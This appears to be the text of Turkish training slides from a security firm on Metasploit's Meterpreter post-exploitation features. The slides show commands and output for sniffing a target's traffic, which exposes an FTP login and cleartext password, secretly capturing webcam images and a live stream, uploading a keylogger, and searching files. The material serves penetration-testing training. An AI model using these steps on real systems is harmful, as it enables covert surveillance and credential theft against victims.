BGA	|	MetasploitTrafik	Dinleme	(Packet Sniffing)
Komut	açıklamaları;
sniffer_dump:	Yakalanan	trafiği	dosya	olarak	kaydeder.
sniffer_interfaces: Ağ	arabirimlerinin	listesini	verir.
sniffer_start: Belirtilen	ağ	arabirimi	için	paket	yakalamaya	başlar
sniffer_stats:	Aktif	sniffing için	istatistlik sunar
sniffer_stop: Belirtilen	ağ	arabirimi	için	dinlemeyi	sonlandırır.
@BGASecurity
BGA	|	MetasploitTrafik	Dinleme	(Packet Sniffing)
• Hedef	sistemdeki	ağ	arabirimlerinin	listesini	ver,
meterpreter >	sniffer_interfaces
1	- 'Intel(R)	PRO/1000	MT	Network	Connection'	(	type:0	mtu:1514	usable:true dhcp:false wifi:false )
• 1	numaralı	ağ	arabirimini	dinle,	20000	paket	yakala
meterpreter >	sniffer_start	1	20000
[*]	Capture	started	on	interface	1	(20000	packet	buffer)
• Sniffing	durumunu	gözlemlemek	için;
meterpreter	>	sniffer_stats	1
[*]	Capture	statistics	for	interface	1
packets:	5605
bytes:	569713
@BGASecurity
BGA	|	MetasploitTrafik	Dinleme	(Packet Sniffing)
• Yakalanan	trafiği	diske	kaydet
meterpreter >	sniffer_dump 1	/tmp/win2.cap
[*]	Flushing packet capture buffer for interface 1...
[*]	Flushed 6044	packets (741732	bytes)
[*]	Download completed,	converting to PCAP...
[*]	PCAP	file	written to /tmp/win2.cap
• Sniffing işlemini	durdur
meterpreter >	sniffer_stop	1
[*]	Capture stopped on	interface 1
@BGASecurity
BGA	|	MetasploitTrafik	Dinleme	(Packet Sniffing)
#	tshark -r	/tmp/win2.cap	-R	ftp
1182	15.000000	89.19.25.155	->	1.1.1.101	FTP	96	Response:	220-FileZilla Server	version 0.9.24	beta
1183	15.000000	89.19.25.155	->	1.1.1.101	FTP	99	Response:	220-written by Tim	Kosse (Tim.Kosse@gmx.de)
1184	15.000000	89.19.25.155	->	1.1.1.101	FTP	115	Response:	220	Please visit http://sourceforge.net/projects/filezilla/
1187	15.000000	1.1.1.101	->	89.19.25.155	FTP	69	Request:	USER	ozanucar
1188	15.000000	89.19.25.155	->	1.1.1.101	FTP	90	Response:	331	Password required for ozanucar
1189	15.000000	1.1.1.101	->	89.19.25.155	FTP	78	Request:	PASS benimgizliparolam
@BGASecurity
BGA	|	MetasploitSes,	Webcam	Görüntüsünü	Yakalama
Hedef	bilgisayarada	bağlı	bir	webcam	varsa,	gizlice	ortamdan	görüntü	almayı	sağlar.
Webcam görüntüsünü	almak	için	“webcam_snap“	komutu;
meterpreter >	webcam_list
1:	Acer Crystal Eye webcam
meterpreter >	webcam_snap
[*]	Starting...
[+]	Got	frame
[*]	Stopped
Webcam	shot	saved	to:	/opt/framework3/msf3/VHBWSraf.jpeg
@BGASecurity
BGA	|	MetasploitCanlı	Webcam	Görüntüsü
• Hedefin	webcam’inden	canlı	olarak	görüntü	almak	için
• meterpreter	>	run	webcam	-p	/tmp/
[*]	Starting	webcam	1:	Acer	Crystal	Eye	webcam
[*]	View	live	stream	at:	/tmp//webcam.htm
[*]	Image	saved	to	:	/tmp//webcam.jpg
@BGASecurity
BGA	|	MetasploitCanlı	Webcam	Görüntüsü
@BGASecurity
BGA	|	MetasploitDosya	/	Dizin	İşlemleri
• Hangi	dizindeyim	(pwd)	?
• C: Dizinine	geçmek	istiyorum	(cd	C:)
• C:dizininde	neler	var	(ls)	…
@BGASecurity
BGA	|	MetasploitDosya	/	Dizin	İşlemleri
• Hedef	sisteme,	istenilen	casus	bir	yazılım	veya	belge/dosya	yüklenebilir.
• Hedefin	C: dizinine	klogger.exe	dosyasını	upload	et;
@BGASecurity
BGA	|	MetasploitHedef	Sistemde	İçerik	Arama
• Hedefte	bir	dosya	türü	veya	ismi	aramak	için	“search”	komutu	kullanılabilinir.	Tüm	ofis	dökümanlarını	
aramak	için;
meterpreter >	search	-f	*.doc
@BGASecurity
BGA	|	MetasploitWmap
• Web	uygulamalarına	yönelik	çeşitli	kontroller	gerçekleştirir.
• Tarama	sonuçlarını	kaydetmek	için	veritabanı	oluşturmak	gerekir.
@BGASecurity
BGA	|	MetasploitWmap |	load_wmap
Wmap sonuçlarını	kaydetmek	için	database oluşturmak	ve	wmap modülünün	aktif	edilmesi
@BGASecurity
BGA	|	MetasploitWmap |	wmap_sites
@BGASecurity
BGA	|	MetasploitWmap |	wmap_run -e
Wmap modüllerinin	uygulanması
@BGASecurity
BGA	|	Metasploit
@BGASecurity
-Teşekkürler-
bgasecurity.com |	@bgasecurity

Mais conteúdo relacionado

Mais procurados

Penetrasyon Testlerinde Açık Kod Yazılımların Kullanımı
Penetrasyon Testlerinde Açık Kod Yazılımların KullanımıPenetrasyon Testlerinde Açık Kod Yazılımların Kullanımı
Penetrasyon Testlerinde Açık Kod Yazılımların Kullanımı
BGA Cyber Security
 
Web Uygulama Güvenliği 101
Web Uygulama Güvenliği 101Web Uygulama Güvenliği 101
Web Uygulama Güvenliği 101
Mehmet Ince
 

Mais procurados (20)

Beyaz Şapkalı Hacker (CEH) Lab Kitabı
Beyaz Şapkalı Hacker (CEH) Lab KitabıBeyaz Şapkalı Hacker (CEH) Lab Kitabı
Beyaz Şapkalı Hacker (CEH) Lab Kitabı
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 16, 17, 18
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 16, 17, 18Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 16, 17, 18
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 16, 17, 18
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
 
Uygulamalı Ağ Güvenliği Eğitim Notları
Uygulamalı Ağ Güvenliği Eğitim NotlarıUygulamalı Ağ Güvenliği Eğitim Notları
Uygulamalı Ağ Güvenliği Eğitim Notları
 
Beyaz Şapkalı Hacker başlangıç noktası eğitimi
Beyaz Şapkalı Hacker başlangıç noktası eğitimiBeyaz Şapkalı Hacker başlangıç noktası eğitimi
Beyaz Şapkalı Hacker başlangıç noktası eğitimi
 
Zararlı Yazılım Analizi Eğitimi Lab Kitabı
Zararlı Yazılım Analizi Eğitimi Lab KitabıZararlı Yazılım Analizi Eğitimi Lab Kitabı
Zararlı Yazılım Analizi Eğitimi Lab Kitabı
 
Uygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
Uygulamalı Ağ Güvenliği Eğitimi Lab ÇalışmalarıUygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
Uygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
 
Caldera İle Saldırı Simülasyonu
Caldera İle Saldırı SimülasyonuCaldera İle Saldırı Simülasyonu
Caldera İle Saldırı Simülasyonu
 
Hacklenmiş Web Sunucu Analizi
Hacklenmiş Web Sunucu AnaliziHacklenmiş Web Sunucu Analizi
Hacklenmiş Web Sunucu Analizi
 
Hacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem AnaliziHacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem Analizi
 
GÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMAGÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMA
 
EXPLOIT POST EXPLOITATION
EXPLOIT POST EXPLOITATIONEXPLOIT POST EXPLOITATION
EXPLOIT POST EXPLOITATION
 
Metasploit El Kitabı
Metasploit El KitabıMetasploit El Kitabı
Metasploit El Kitabı
 
Penetrasyon Testlerinde Açık Kod Yazılımların Kullanımı
Penetrasyon Testlerinde Açık Kod Yazılımların KullanımıPenetrasyon Testlerinde Açık Kod Yazılımların Kullanımı
Penetrasyon Testlerinde Açık Kod Yazılımların Kullanımı
 
Zararlı Yazılım Analizi İçin Lab Ortamı Hazırlamak
Zararlı Yazılım Analizi İçin Lab Ortamı HazırlamakZararlı Yazılım Analizi İçin Lab Ortamı Hazırlamak
Zararlı Yazılım Analizi İçin Lab Ortamı Hazırlamak
 
Web Servislerine Yönelik Sızma Testleri
Web Servislerine Yönelik Sızma TestleriWeb Servislerine Yönelik Sızma Testleri
Web Servislerine Yönelik Sızma Testleri
 
Web Uygulama Güvenliği 101
Web Uygulama Güvenliği 101Web Uygulama Güvenliği 101
Web Uygulama Güvenliği 101
 
Windows Ağlarda Saldırı Tespiti
Windows Ağlarda Saldırı TespitiWindows Ağlarda Saldırı Tespiti
Windows Ağlarda Saldırı Tespiti
 

Destaque

Yazılım Güvenliği Temelleri
Yazılım Güvenliği TemelleriYazılım Güvenliği Temelleri
Yazılım Güvenliği Temelleri
BGA Cyber Security
 
Mobil Sistemler ve Uygulama Güvenliği
Mobil Sistemler ve Uygulama GüvenliğiMobil Sistemler ve Uygulama Güvenliği
Mobil Sistemler ve Uygulama Güvenliği
BGA Cyber Security
 
Adli Bilişim Açısından E-posta Sistemi
Adli Bilişim Açısından E-posta SistemiAdli Bilişim Açısından E-posta Sistemi
Adli Bilişim Açısından E-posta Sistemi
BGA Cyber Security
 
Arp protokolu ve guvenlik zafiyeti
Arp  protokolu ve guvenlik zafiyetiArp  protokolu ve guvenlik zafiyeti
Arp protokolu ve guvenlik zafiyeti
BGA Cyber Security
 
DOS, DDOS Atakları ve Korunma Yöntemleri
DOS, DDOS Atakları ve Korunma YöntemleriDOS, DDOS Atakları ve Korunma Yöntemleri
DOS, DDOS Atakları ve Korunma Yöntemleri
BGA Cyber Security
 
Derinlemesine Paket İnceleme (Deep Packet Inspection)
Derinlemesine Paket İnceleme (Deep Packet Inspection)Derinlemesine Paket İnceleme (Deep Packet Inspection)
Derinlemesine Paket İnceleme (Deep Packet Inspection)
BGA Cyber Security
 
DDOS Saldırıları ve Korunma Yolları
DDOS Saldırıları ve Korunma YollarıDDOS Saldırıları ve Korunma Yolları
DDOS Saldırıları ve Korunma Yolları
netsec
 
SynFlood DDOS Saldırıları ve Korunma Yolları
SynFlood DDOS Saldırıları ve Korunma YollarıSynFlood DDOS Saldırıları ve Korunma Yolları
SynFlood DDOS Saldırıları ve Korunma Yolları
BGA Cyber Security
 

Destaque (20)

Yazılım Güvenliği Temelleri
Yazılım Güvenliği TemelleriYazılım Güvenliği Temelleri
Yazılım Güvenliği Temelleri
 
Mobil Sistemler ve Uygulama Güvenliği
Mobil Sistemler ve Uygulama GüvenliğiMobil Sistemler ve Uygulama Güvenliği
Mobil Sistemler ve Uygulama Güvenliği
 
Adli Bilişim Açısından E-posta Sistemi
Adli Bilişim Açısından E-posta SistemiAdli Bilişim Açısından E-posta Sistemi
Adli Bilişim Açısından E-posta Sistemi
 
Arp protokolu ve guvenlik zafiyeti
Arp  protokolu ve guvenlik zafiyetiArp  protokolu ve guvenlik zafiyeti
Arp protokolu ve guvenlik zafiyeti
 
DOS, DDOS Atakları ve Korunma Yöntemleri
DOS, DDOS Atakları ve Korunma YöntemleriDOS, DDOS Atakları ve Korunma Yöntemleri
DOS, DDOS Atakları ve Korunma Yöntemleri
 
Windows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme ÇalışmalarıWindows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme Çalışmaları
 
DDoS Saldırıları ve Korunma Yöntemleri ile E-posta ve ATM Güvenliği
DDoS Saldırıları ve Korunma Yöntemleri ile E-posta ve ATM GüvenliğiDDoS Saldırıları ve Korunma Yöntemleri ile E-posta ve ATM Güvenliği
DDoS Saldırıları ve Korunma Yöntemleri ile E-posta ve ATM Güvenliği
 
Derinlemesine Paket İnceleme (Deep Packet Inspection)
Derinlemesine Paket İnceleme (Deep Packet Inspection)Derinlemesine Paket İnceleme (Deep Packet Inspection)
Derinlemesine Paket İnceleme (Deep Packet Inspection)
 
Web Uygulama Güven(siz)liği
Web Uygulama Güven(siz)liğiWeb Uygulama Güven(siz)liği
Web Uygulama Güven(siz)liği
 
Web 2.0 Güvenliği
Web 2.0 GüvenliğiWeb 2.0 Güvenliği
Web 2.0 Güvenliği
 
Kablosuz Ağlarda Güvenlik
Kablosuz Ağlarda GüvenlikKablosuz Ağlarda Güvenlik
Kablosuz Ağlarda Güvenlik
 
Temel Kavramlar, DoS/DDoS Saldırıları ve Çeşitleri
Temel Kavramlar, DoS/DDoS Saldırıları ve ÇeşitleriTemel Kavramlar, DoS/DDoS Saldırıları ve Çeşitleri
Temel Kavramlar, DoS/DDoS Saldırıları ve Çeşitleri
 
Sızma Testine Giriş - Fuat Ulugay
Sızma Testine Giriş  - Fuat UlugaySızma Testine Giriş  - Fuat Ulugay
Sızma Testine Giriş - Fuat Ulugay
 
Web Uygulama Pentest Eğitimi
Web Uygulama Pentest EğitimiWeb Uygulama Pentest Eğitimi
Web Uygulama Pentest Eğitimi
 
DDOS Saldırıları ve Korunma Yolları
DDOS Saldırıları ve Korunma YollarıDDOS Saldırıları ve Korunma Yolları
DDOS Saldırıları ve Korunma Yolları
 
SynFlood DDOS Saldırıları ve Korunma Yolları
SynFlood DDOS Saldırıları ve Korunma YollarıSynFlood DDOS Saldırıları ve Korunma Yolları
SynFlood DDOS Saldırıları ve Korunma Yolları
 
Sosyal Medyada Anonim Hesaplar Nasıl Tespit Edilir? - NETSEC
Sosyal Medyada Anonim Hesaplar Nasıl Tespit Edilir? - NETSECSosyal Medyada Anonim Hesaplar Nasıl Tespit Edilir? - NETSEC
Sosyal Medyada Anonim Hesaplar Nasıl Tespit Edilir? - NETSEC
 
Bilgi Güvenliğinde Sızma Testleri
Bilgi Güvenliğinde Sızma TestleriBilgi Güvenliğinde Sızma Testleri
Bilgi Güvenliğinde Sızma Testleri
 
WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ
 
10 Adımda Sızma Testleri
10 Adımda Sızma Testleri10 Adımda Sızma Testleri
10 Adımda Sızma Testleri
 

Semelhante a Metasploit Framework Eğitimi

Bilgi Güvenliğinde Sızma Testleri
Bilgi Güvenliğinde Sızma TestleriBilgi Güvenliğinde Sızma Testleri
Bilgi Güvenliğinde Sızma Testleri
BGA Cyber Security
 

Semelhante a Metasploit Framework Eğitimi (20)

Twitter Güvenlik ve Gizlilik Ayarları
Twitter Güvenlik ve Gizlilik AyarlarıTwitter Güvenlik ve Gizlilik Ayarları
Twitter Güvenlik ve Gizlilik Ayarları
 
Twitter Üzerinde Güvenlik ve Gizlilik Ayarları
Twitter Üzerinde Güvenlik ve Gizlilik AyarlarıTwitter Üzerinde Güvenlik ve Gizlilik Ayarları
Twitter Üzerinde Güvenlik ve Gizlilik Ayarları
 
Facebook Üzerinde Güvenlik ve Gizlilik Ayarları
Facebook Üzerinde Güvenlik ve Gizlilik AyarlarıFacebook Üzerinde Güvenlik ve Gizlilik Ayarları
Facebook Üzerinde Güvenlik ve Gizlilik Ayarları
 
Facebook Güvenlik ve Gizlilik Ayarları
Facebook Güvenlik ve Gizlilik AyarlarıFacebook Güvenlik ve Gizlilik Ayarları
Facebook Güvenlik ve Gizlilik Ayarları
 
Yeni Nesil DDOS Saldırıları ve Korunma Yöntemleri
Yeni Nesil DDOS Saldırıları ve Korunma YöntemleriYeni Nesil DDOS Saldırıları ve Korunma Yöntemleri
Yeni Nesil DDOS Saldırıları ve Korunma Yöntemleri
 
Gerçek Dünyadan Siber Saldırı Örnekleri
Gerçek Dünyadan Siber Saldırı Örnekleri Gerçek Dünyadan Siber Saldırı Örnekleri
Gerçek Dünyadan Siber Saldırı Örnekleri
 
BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1
BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1
BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1
 
BGA Pentest Hizmeti
BGA Pentest HizmetiBGA Pentest Hizmeti
BGA Pentest Hizmeti
 
Some’lerden Beklenen Adli bilişim Yetkinlikleri
Some’lerden Beklenen Adli bilişim YetkinlikleriSome’lerden Beklenen Adli bilişim Yetkinlikleri
Some’lerden Beklenen Adli bilişim Yetkinlikleri
 
BGA Bilgi Güvenliği A.Ş. Tanıtım Sunumu
BGA Bilgi Güvenliği A.Ş. Tanıtım SunumuBGA Bilgi Güvenliği A.Ş. Tanıtım Sunumu
BGA Bilgi Güvenliği A.Ş. Tanıtım Sunumu
 
Group Policy ve Yonetim Araclari
Group Policy ve Yonetim AraclariGroup Policy ve Yonetim Araclari
Group Policy ve Yonetim Araclari
 
BGA Eğitim Sunum
BGA Eğitim SunumBGA Eğitim Sunum
BGA Eğitim Sunum
 
Bilgi Güvenliğinde Sızma Testleri
Bilgi Güvenliğinde Sızma TestleriBilgi Güvenliğinde Sızma Testleri
Bilgi Güvenliğinde Sızma Testleri
 
Morten-BTEgitim Sunum_v01
Morten-BTEgitim Sunum_v01Morten-BTEgitim Sunum_v01
Morten-BTEgitim Sunum_v01
 
8 Ocak 2015 SOME Etkinligi - BGA Bankalar İçin Some Kurulumu
8 Ocak 2015 SOME Etkinligi - BGA Bankalar İçin Some Kurulumu8 Ocak 2015 SOME Etkinligi - BGA Bankalar İçin Some Kurulumu
8 Ocak 2015 SOME Etkinligi - BGA Bankalar İçin Some Kurulumu
 
Bilgi Güvenliği Farkındalık Eğitim Sunumu
Bilgi Güvenliği Farkındalık Eğitim SunumuBilgi Güvenliği Farkındalık Eğitim Sunumu
Bilgi Güvenliği Farkındalık Eğitim Sunumu
 
Web Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği
Web	Uygulama Saldırıları ve Klasik Çözümlerin YetersizliğiWeb	Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği
Web Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği
 
789 yazilim360egitimleri2014
789 yazilim360egitimleri2014789 yazilim360egitimleri2014
789 yazilim360egitimleri2014
 
Sosyal Medyada Anonim / Sahte Hesapların Tespiti
Sosyal Medyada Anonim / Sahte Hesapların TespitiSosyal Medyada Anonim / Sahte Hesapların Tespiti
Sosyal Medyada Anonim / Sahte Hesapların Tespiti
 
Sosyal Medya Analizinde Yapılan Hatalar / Analytics Meetup
Sosyal Medya Analizinde Yapılan Hatalar / Analytics MeetupSosyal Medya Analizinde Yapılan Hatalar / Analytics Meetup
Sosyal Medya Analizinde Yapılan Hatalar / Analytics Meetup
 

Mais de BGA Cyber Security

Mais de BGA Cyber Security (20)

WEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiWEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesi
 
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdfTatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
 
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık EğitimiÜcretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
 
3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?
 
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
 
Webinar: Popüler black marketler
Webinar: Popüler black marketlerWebinar: Popüler black marketler
Webinar: Popüler black marketler
 
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım SenaryolarıWebinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
 
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
 
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm ÖnerileriDNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
 
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakWebinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
 
Open Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIOpen Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-II
 
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner GüvenliğiWebinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
 
Open Source SOC Kurulumu
Open Source SOC KurulumuOpen Source SOC Kurulumu
Open Source SOC Kurulumu
 
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİRAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
 
Siber Fidye 2020 Raporu
Siber Fidye 2020 RaporuSiber Fidye 2020 Raporu
Siber Fidye 2020 Raporu
 
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing RaporuBGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
 
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu ÇözümlerSOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
 
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of SecretsVeri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
 
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi ToplamaAktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
 
SSL Sertifikalarından Phishing Domain Tespiti
SSL Sertifikalarından Phishing Domain TespitiSSL Sertifikalarından Phishing Domain Tespiti
SSL Sertifikalarından Phishing Domain Tespiti
 

Metasploit Framework Eğitimi